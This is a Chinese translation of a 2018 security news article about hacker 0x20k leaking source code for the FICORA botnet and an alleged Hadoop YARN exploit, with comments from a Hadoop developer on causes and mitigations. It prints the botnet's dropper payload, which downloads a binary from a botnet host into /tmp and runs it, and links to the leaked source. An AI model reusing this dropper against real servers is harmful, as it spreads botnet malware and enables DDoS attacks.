幽灵战队的0x20k发布了针对Apache Hadoop的0day漏洞

幽灵战队的0x20k发布了用于攻击Apache Hadoop的0day漏洞，该漏洞被指用于搭建FICORA僵尸网络。

对于早些时候关于利用Hadoop集群建立DemonBot的新闻，幽灵战队的黑客0x20k发布了用于构建最新版FICORA僵尸网络的完整源代码来作出回应,网址是https://ghostbin.com/paste/f87rf

0x20k也被认为是Yasaku Botnet的作者，他也是下面所提及的0day漏洞的作者。

与被认为感染了70台服务器的DemonBot僵尸网络不同，20k声称已经感染了1000多台服务器。通过Voxility的验证，这些服务器出口流量达到350 Gbps以上。

根据20k的说法，现在臭名昭著的僵尸网络DemonBot的作者从Owari的作者的服务器上窃取了它，然后在2018年9月将其放到网上售卖。这样DemonBot发明人的“荣誉”就落在了错误的人身上，这就是为什么20k决定在任何人试图从他手中偷走它之前，在外网开放它，以验证所有权。20k还发布了几段视频，展示了他在不同的服务器和服务上测试各种攻击，包括OVH、NFO、ProxyPipe和Mineplex——据称他们的攻击流量在110gbps到200gbps之间。

就这两个僵尸网络的操作方式而言，它们是非常不同的。例如，根据设备/服务器上Python或Perl和telnetd的可利用性，DemonBot通过端口6982在22或23上感染和传播。

而FICORA则通过8088端口感染。在Demonbot中，DDoS攻击向量支持UDP和TCP洪水，而FICORA在TCP32端口中使用URG洪水。此外，DemonBot只是Lizkebab的一个重命名版本，而FICORA则类似于Mirai，但是它和Mirai功能不同。

所涉及的源码

Rogue安全实验室已经联系了几家受到影响的服务机构，以确认攻击的有效性。尽管OVH拒绝就此事置评，但NFO总裁兼首席执行官证实，针对他们服务器的每3次访问就有一次攻击。另一方面，ProxyPipe对我的邮件采取强硬的回话，声称他们的服务器从来没有崩溃过，公司也从来没有见过接近200 Gbps流量的服务器。

在回应NFO面临的DoS攻击时，John说:“110 Gbps这个数字很可能来自我们的网站https://www.nfoservers.com/networklocations.php。”

他补充说:“攻击者通常会引用该站点，因为一旦当他们能够触发空路由时，就会产生大量的流量，尽管这并不是它的实际作用。”他没有证实或否认FICORA僵尸网络是否能吸引这类流量，他只是说，YouTube视频上展示的IP并不一定能让僵尸网络所有者准确地了解到产生的流量。尽管他说那些IP肯定在特定的日期都崩溃了。

如何利用:

经过分析，专门研究Apache Hadoop的软件开发人员Steve Loughran告诉Rogue Security，“如果这发生在支持Kerberos的YARN集群上，那么YARN REST API中的一个弱点就是spnego认证的调用者身份验证失败。这是我们可以看到和处理的东西。或者是管理工具使用默认密码来获得权限。解释说，“就好像集群在没有密码检查的情况下启用了telnet或rlogin一样。”

然而，正如20k解释的那样，FICORA包含telnet、ssh和hadoop服务器。对于telnet服务，他使用了字典的爆破，就像ssh一样，hadoop占据了最多的数量。20k补充说，是一个远程代码执行bug让他能够在Hadoop的目录/tmp中执行x86二进制文件。

有效payload基本上是 cd /tmp
                  wget http://botet.server/x86
                  chmod 777 x86
                  ./x86 hadoop.x86

也许最重要的是，正如20k在发布这个漏洞时所解释的那样:“我们已经隐藏好了这个漏洞，希望你能抓住它们。”对于Hadoop开发者来说，这尤其令人担忧。Loughran表示，Apache能做的就是“为集群提供启动Kerberos的建议”。对于这个特定的集群，关闭YARN API可能会破坏一些东西，但是如果恶意软件依赖于它的存在(以及已知的HTTP端口)，那么在YARN-site.xm l中将这个属性的设为false。

图像可能包含:文本

“这可能会暂时减缓它的速度——尽管可能会破坏依赖它的应用程序——但如果恶意软件能够发出Hadoop RPC调用来执行YARN，它仍然可以提交工作，或者，由于HDFS文件系统同样不受保护，通过FS进入。”

根据这个脚本，Loughran注意到这个漏洞不是一个远程代码执行错误，而是一个远程作业提交。到今天为止，10/31/2018,Apache正在积极地尝试计算是否有一些Hadoop REST api的实际利用，即使是在启用安全选项的情况下，或者这是否是一个不安全的Hadoop集群正在运行其他人的代码的问题。由于没有已知的漏洞补丁存在，Loughran甚至承认，考虑到漏洞利用ssh端口来进行字典攻击，需要修复服务器的数量可能超出了预估的范围。

尽管如此，Hadoop的开发者声称上面列出的漏洞“不是0day漏洞”。他们表示，更有可能的是这是一种“对网络上可见的不安全Hadoop集群上有计划的攻击”。然而，即便如此，Loughran也无法弄清楚代码到底是如何工作或者破坏设备的，他说，“可能是启用了Kerberos的系统存在真正的漏洞。”如果真的是这样的话，那就是0day。

那么，现在的解决办法是什么?不要让你的系统在互联网上暴露。实际上，如果可能的话，在一个私网中保持对访问权限的控制。

原文链接：https://securityaffairs.co/wordpress/77565/malware/hadoop-zero-day-exploit-leaked.html